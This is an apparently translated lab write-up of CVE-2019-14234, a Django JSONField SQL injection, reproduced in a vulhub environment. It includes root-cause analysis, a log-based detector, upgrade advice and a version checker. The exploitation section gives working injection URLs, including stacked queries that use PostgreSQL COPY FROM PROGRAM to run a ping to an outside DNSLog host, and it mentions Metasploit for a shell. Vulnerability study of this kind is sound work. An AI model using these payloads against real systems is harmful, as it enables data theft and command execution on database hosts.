2025-01-18 Update. From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 05/31 Report
This article analyzes and reproduces CVE-2019-14234, a SQL injection vulnerability in Django's JSONField. Many newcomers are unclear about how it works, so the following walks through the root cause, an exploitation chain in a lab environment, and the fix in detail.
0x01 Introduction
Django is a popular open-source web framework written in Python; many websites and applications are built on it.
What is JSONField? Django is a large, batteries-included web framework that supports many database engines, including PostgreSQL, MySQL, Oracle and SQLite3, but none pairs with Django as naturally as PostgreSQL, and the Django project itself recommends using it with PostgreSQL.
Compared with MySQL, PostgreSQL supports a richer set of data types, and its native support for JSON data gives this relational database some NoSQL characteristics. JSONField (in django.contrib.postgres.fields) is the Django model field that maps onto PostgreSQL's jsonb type.
0x02 Vulnerability overview
The vulnerability requires that the developer uses JSONField (or HStoreField) and that the user controls the key name of a queryset lookup; SQL can then be injected through the key name.
Django is usually paired with PostgreSQL, and JSONField wraps that database's jsonb type. The root cause lies in Django's implementation of JSONField key lookups. The core job of a Django model is to generate SQL, but when Django generated the SQL for a JSONField key lookup it did so by plain string concatenation.
Key lookups on JSONField are handled by the KeyTransform class, whose as_sql method is where the SQL text is generated.
key_name is a user-controlled string, and the resulting statement is WHERE (field -> 'key_name') = 'value'. Because key_name is pasted into the query text (the value, by contrast, is passed as a bound parameter), a quote in the key name breaks out of the literal and SQL injection is possible.
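To make the mechanism concrete, the following added example (it is not Django's source; it is a simplified re-implementation of the SQL-building step in KeyTransform.as_sql) builds the WHERE fragment for filter(**{'detail__' + key_name: value}) the way vulnerable Django did and the way the fixed version does, without needing a database. The table and column names "vuln_collection"."detail" are assumed from the vulhub application; render() only approximates psycopg2's client-side parameter substitution for display.

```python
# Added example: minimal model of KeyTransform.as_sql before and after the
# CVE-2019-14234 fix. Not Django's own code; no database required.

LHS = '"vuln_collection"."detail"'   # column expression (names assumed from the vulhub app)


def vulnerable_key_transform_sql(lhs, key_name, params):
    """Pre-fix behaviour (Django < 2.2.4 / 2.1.11 / 1.11.23).

    A non-numeric key is wrapped in single quotes with %-formatting, so a
    quote inside key_name terminates the literal early.
    """
    try:
        int(key_name)
    except ValueError:
        lookup = "'%s'" % key_name      # injection point: raw string concatenation
    else:
        lookup = "%s" % key_name        # numeric array index, e.g. detail__0
    return "(%s -> %s)" % (lhs, lookup), list(params)


def patched_key_transform_sql(lhs, key_name, params):
    """Post-fix behaviour: the key name travels as a bound parameter."""
    return "(%s -> %%s)" % lhs, list(params) + [key_name]


def build_where(key_name, value, key_transform_sql):
    """WHERE fragment for filter(**{'detail__' + key_name: value}).

    JSONField's exact lookup JSON-encodes the right-hand side, so the
    string "123" becomes the bound parameter '"123"'.
    """
    lhs_sql, params = key_transform_sql(LHS, key_name, [])
    return "WHERE %s = %%s" % lhs_sql, params + ['"%s"' % value]


def render(sql, params):
    """Approximate psycopg2's client-side substitution, for display only:
    each parameter becomes a quoted literal with embedded quotes doubled."""
    out = sql
    for p in params:
        out = out.replace("%s", "'%s'" % p.replace("'", "''"), 1)
    return out


def quotes_balanced(sql):
    """Cheap tell for a broken literal: single quotes should pair up."""
    return sql.count("'") % 2 == 0


def compare(key_name, value="123"):
    """Return (vulnerable_sql, vulnerable_params, patched_sql, patched_params)."""
    return (*build_where(key_name, value, vulnerable_key_transform_sql),
            *build_where(key_name, value, patched_key_transform_sql))


if __name__ == "__main__":
    for key in ("title", "a'b", "title')='1' or 1=1--"):
        v_sql, v_params, p_sql, p_params = compare(key)
        print("key        :", key)
        print("vulnerable :", render(v_sql, v_params), "| balanced:", quotes_balanced(v_sql))
        print("patched    :", render(p_sql, p_params), "| balanced:", quotes_balanced(p_sql))
        print()
```

With the page's payload the vulnerable path yields WHERE ("vuln_collection"."detail" -> 'title')='1' or 1=1--') = '"123"', so everything after the comment marker (including the real comparison) is discarded and the OR 1=1 matches every row; the patched path keeps the whole payload inside one quoted literal.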
0x03 Affected versions
Django main development branch (at the time of the advisory)
Django 2.2.x < 2.2.4
Django 2.1.x < 2.1.11
Django 1.11.x < 1.11.23
0x04 Environment setup
Build a Docker environment using vulhub.
Vulhub download address: https://github.com/vulhub/vulhub
cd vulhub/django/CVE-2019-14234/
docker-compose up -d
If the Django start page loads when you open http://ip:8000 in a browser, the environment was built successfully.
0x05 Exploitation
From the code analysis we know that if an application uses JSONField and the key name of a lookup is user-controllable, SQL injection is possible. In this environment the Django admin change list turns query-string parameters into filter() lookups, so the key name can be supplied directly in the URL.
Visit http://ip:8000/admin
Log in with user name admin, password a123123123
Then construct a URL that triggers the lookup. Payload:
http://ip:8000/admin/vuln/collection/?detail__a'b=123
The resulting error page shows the injection worked: the stray quote breaks the query, and Django's debug output displays the generated SQL statement, which we use to construct the next payload:
http://ip:8000/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%2d%2d%20
Since or 1=1 is always true, all rows are returned.
Combining this with CVE-2019-9193 (PostgreSQL's COPY ... FROM PROGRAM), we try to execute operating-system commands. Stacked queries work here because psycopg2 sends the whole text to PostgreSQL as one query string, so a ; can start a second statement. Construct the URL as follows:
http://192.168.10.195:8000/admin/vuln/collection/?detail__title')%3d'1'%20or%201%3d1%3bcreate%20table%20cmd_exec%20(cmd_output%20text)--%20
Although the page shows an error, the error is "no results to fetch", which means our statement was executed: CREATE TABLE returns no rows for the ORM to fetch.
Use DNSLog to detect whether commands can be executed.
DNSLog web site: http://dnslog.cn/
Payload:
http://192.168.10.195:8000/admin/vuln/collection/?detail__title')%3d'1'%20or%201%3d1%3bcopy%20cmd_exec%20FROM%20PROGRAM%20'ping%20k1anij.dnslog.cn'--%20
A DNS query for the subdomain arrives at dnslog.cn, so the command ran on the database host.
Note that COPY ... FROM PROGRAM requires a superuser or (PostgreSQL 11+) a member of pg_execute_server_program, and the command runs as the postgres OS user on the database host, not on the web server. The PostgreSQL container in this environment has no port mapped to the outside; if the database port is exposed, or in a real environment, you can also combine Metasploit with CVE-2019-9193 to get a shell.
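From the detection side, the probes above leave a distinctive trace: the injected SQL sits in the query-parameter name (the part before =), not in a value, because only key names were concatenated into SQL. The added example below (not part of the original article) scans constructed access-log lines for admin requests whose lookup names contain a __ separator but are not plain identifiers, and separates plain injection probes from COPY ... FROM PROGRAM attempts. The log lines are constructed for this example and mirror the payloads used above, percent-encoded as a browser would send them.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from a real server). The request
# targets mirror the probes used in this article, percent-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [31/May/2020:10:01:02 +0000] "GET /admin/vuln/collection/?detail__title=123 HTTP/1.1" 200 4312
10.0.0.9 - - [31/May/2020:10:01:10 +0000] "GET /admin/vuln/collection/?detail__a%27b=123 HTTP/1.1" 500 1803
10.0.0.9 - - [31/May/2020:10:01:33 +0000] "GET /admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%2d%2d%20 HTTP/1.1" 200 9981
10.0.0.9 - - [31/May/2020:10:02:01 +0000] "GET /admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping%20k1anij.dnslog.cn%27%2d%2d%20 HTTP/1.1" 500 1803
10.0.0.7 - - [31/May/2020:10:03:00 +0000] "GET /admin/vuln/collection/?q=hello%27world HTTP/1.1" 200 4100
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A legitimate Django lookup is a chain of identifiers: field__key__lookup
IDENT_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*$')
# Command execution via PostgreSQL COPY ... FROM PROGRAM (CVE-2019-9193)
RCE_RE = re.compile(r'copy\s+\S+\s+from\s+program', re.IGNORECASE)


def suspicious_lookup_keys(target):
    """Query-parameter names that contain a lookup separator but are not identifiers.

    Only names are inspected: values were bound parameters even in vulnerable
    Django, so a quote inside a value (q=hello'world) is not this bug.
    Percent-decoding happens after the split, so an encoded & or ; in a
    payload cannot hide a parameter from the scan.
    """
    hits = []
    for name, _value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if "__" in name and not IDENT_RE.match(name):
            hits.append(name)
    return hits


def classify(key):
    """Distinguish a stacked COPY FROM PROGRAM attempt from a plain injection probe."""
    return "rce-attempt" if RCE_RE.search(key) else "sqli-attempt"


def scan_log(text):
    """Return (client_ip, decoded_key_name, severity) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for key in suspicious_lookup_keys(m.group("target")):
            findings.append((m.group("ip"), key, classify(key)))
    return findings


if __name__ == "__main__":
    for ip, key, severity in scan_log(SAMPLE_LOG):
        print("%-10s %-13s %r" % (ip, severity, key))
```

The first sample line (a normal detail__title=123 filter) and the last one (a quote in a value) are not reported; the three requests from 10.0.0.9 are, with the DNSLog payload classified as a command-execution attempt.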
0x06 Remediation
Upgrade to a fixed release: Django 2.2.4, 2.1.11 or 1.11.23 or later. The fix passes the key name to the database as a bound query parameter instead of interpolating it into the SQL text. As defence in depth, application code should never use raw user input as the key part of a filter() lookup without first validating it against an allowlist of expected key names.
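A quick check that an installed version falls outside the affected ranges listed in 0x03, as an added example (not part of the article or of Django). The version string is whatever django.get_version() or pip show django reports; it is passed in as text here. Pre-release suffixes such as .dev are ignored, so for a development checkout verify the commit rather than the number.

```python
import re

# Added example: map a Django version string onto the CVE-2019-14234
# affected ranges. Not from the article or the Django project.

# First fixed micro release in each affected series
FIXED_MICRO = {(1, 11): 23, (2, 1): 11, (2, 2): 4}


def parse_version(text):
    """'2.2.3', '2.2.4.dev20190801' or '1.11' -> (major, minor, micro)."""
    m = re.match(r'\s*(\d+)\.(\d+)(?:\.(\d+))?', text)
    if not m:
        raise ValueError("unrecognised Django version: %r" % text)
    major, minor, micro = m.groups()
    return int(major), int(minor), int(micro or 0)


def is_vulnerable(text):
    """True/False for the series covered by the advisory.

    Returns None for series the advisory does not cover (e.g. 2.0.x, already
    out of support when the fix shipped); treat those as unpatched.
    """
    major, minor, micro = parse_version(text)
    series = (major, minor)
    if series in FIXED_MICRO:
        return micro < FIXED_MICRO[series]
    if series > (2, 2):
        return False   # 3.0 and later were released after the fix
    return None


if __name__ == "__main__":
    for v in ("1.11.22", "1.11.23", "2.1.10", "2.1.11", "2.2.3", "2.2.4", "2.0.13", "3.0"):
        print("%-8s vulnerable=%s" % (v, is_vulnerable(v)))
```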